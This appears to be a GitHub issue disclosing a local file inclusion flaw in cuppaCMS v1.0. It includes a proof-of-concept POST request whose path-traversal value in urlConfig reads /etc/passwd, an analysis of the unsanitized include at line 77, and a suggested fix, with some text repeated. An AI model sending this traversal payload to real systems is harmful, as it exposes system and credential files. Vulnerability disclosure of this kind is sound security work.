POST /alerts/alertConfigField.php
urlConfig=../../../../../../../../../../../../../../etc/passwd
analysis
location: /alerts/alertConfigField.php line 77 <?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>
and $cuppa->POST
// post
public function POST($string){
return $this->sanitizeString(@$_POST[$string]);
}
go on
public function sanitizeString($string){
return htmlspecialchars(trim(@$string));
}
so the post urlConfig without any lfi protected filter
Repair suggestions
you can check urlConfig ,for example check if it has .. then refuse this request
The text was updated successfully, but these errors were encountered:
Product version:cuppaCMS v1.0 http://cuppacms.com/files/cuppa_cms.zip
poc
analysis
location: /alerts/alertConfigField.php line 77

<?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>and $cuppa->POST
go on
so the post urlConfig without any lfi protected filter
Repair suggestions
you can check urlConfig ,for example check if it has .. then refuse this request
The text was updated successfully, but these errors were encountered: